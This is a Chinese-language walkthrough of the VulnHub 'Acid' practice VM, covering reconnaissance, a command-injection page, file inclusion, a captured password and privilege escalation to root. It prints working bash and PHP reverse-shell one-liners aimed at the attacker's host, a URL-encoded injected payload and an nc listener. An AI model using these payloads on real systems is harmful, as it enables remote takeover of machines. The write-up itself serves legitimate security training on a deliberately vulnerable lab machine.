参考链接：

​​​​​​​【VulnHub】Acid靶场复盘-CSDN博客

靶场渗透（二）——Acid渗透_ambassador 靶场渗透-CSDN博客

网络安全从0到0.5之Acid靶机实战渗透测试 | CN-SEC 中文网

Vulnhub靶场渗透练习(四) Acid - 紅人 - 博客园

红日团队笔记

信息收集

主机：kali，靶机：Acid

下载地址：https://download.vulnhub.com/acid/Acid.rar

扫描网段：arp-scan -l

扫描端口：

nmap -A -p- -sV 192.168.91.146（扫描全部端口）

开放端口33447，底层服务：Apache2.4.10，操作系统：Ubuntu

192.168.91.146:33447访问

dirb爆破目录，其实是没有有效结果的

查看页面源代码

转码两次后获得wow.jpg

访问路径，获取图片

在editor中发现一串数字，放入十六进制转换为ascii码

7aee0f6d588ed9905ee37f16a7c610d4，32位大概率为md5

解密为63425

最后发现没啥用

爆破目录

使用dirbuster爆破目录，用small字典，爆破提示的Challenge

目录下存在index.php，error.php，cake.php，include.php，hacked.php

或者直接使用dirb调用字典

使用-x参数，爆破.php文件,用big字典

dirb http://192.168.91.146:33447/Challenge /usr/share/wordlists/dirb/big.txt -X .php

渗透测试

访问cake.php，标题提示含有Magic_Box目录，爆破目录

http://192.168.91.146:33447/Challenge/cake.php/Magic_Box

这里需要多尝试 一下，/Challenge/Magic_Box，从这个位置开始访问。

命令执行

这个ip地址可以爆破出一个页面，进行命令执行

127.0.0.1;cat /etc/passwd，存在命令执行漏洞

进行命令执行测试，寻找默认密码

访问include.php，存在文件包含漏洞

转包，进行URL编码,/变为%2F,实现文件包含

关注地址为:/bin/bash

漏洞利用

使用通过URL编码的命令进行bash反弹，这里ip为攻击机（kali）的地址

bash反弹，单引号和双引号好像都行

bash -c：运行后面的字符串作为 Bash 命令。 'bash -i >& /dev/tcp/192.168.91.138/6666 0>&1'：这是要执行的 Bash 命令。它包含以下几个部分： bash -i：启动一个交互式的 Bash shell。 -i 选项表示交互式。 >& /dev/tcp/192.168.91.138/6666：将标准输出和标准错误重定向到指定的 IP 地址和端口。 /dev/tcp 是一个特殊的设备文件，Bash 可以将其视为网络套接字。 0>&1：将标准输入重定向到标准输出。这样，我们就可以在远程主机上执行命令并获取输出。 此命令的目的是将被攻击主机上的 Bash shell 与指定 IP 地址和端口上的远程主机建立连接，使攻击者能够通过该连接远程控制被攻击主机并执行命令。

bash -c 'bash -i >& /dev/tcp/192.168.217.130/6666 0>&1'

127.0.0.1; bash -i >& /dev/tcp/192.168.217.130/6666 0>&1

bash -i >& /dev/tcp/192.168.217.130/6666 0>&1

php反弹：

php -r '$sock=fsockopen("192.168.91.138",6666);exec("/bin/bash -i &3 2>&3");'

直接在burpsuite里进行调整，点击encode，到URL

127.0.0.1|%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%39%31%2e%31%33%38%2f%36%36%36%36%20%30%3e%26%31%27

192.168.217.130

监听

nc -lvp 6666

成功上线

权限提升

进行提权

这里是su执行，必须需要一个终端

python导入交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

cat /etc/passwd

查看用户名，

acif、saman、root为:/bin/bash

在

/tmp存放临时文件

/tmp$ ls /home 出现用户

这里应该是直接到home目录查看

前面已经获取了密码

查找acid用户创建的文件（不显示错误）

find：一个用于搜索文件和目录的常用命令。 /：表示要搜索的起始路径，这里是根目录。 -user acid：指定只搜索由用户"acid"创建的文件和目录。 2>/dev/null：将标准错误输出重定向到

/dev/null，即丢弃错误信息，避免出现权限错误提示。

find / -user acid 2>/dev/null

出现了一个流量包

方法一：

先进到/home，再cd到/sbin

python -m SimpleHTTPServer 8080

出现文件，下载分析

tcp.stream只看tcp协议的包

发现用户密码1337hax0r

进行提权

当前用户有 sudo 权限，想切换到 root

先切换到saman

www-data@acid:/var/www/html/Challenge/Magic_Box$ su saman

su saman

Password: 1337hax0r

需要的是当前用户的密码

sudo -i

查看当前用户的权限情况

su权限过高，直接提权到root

这里不能直接su root，并不知道root密码

使用

sudo -l

只需要当前用户的密码

得到flag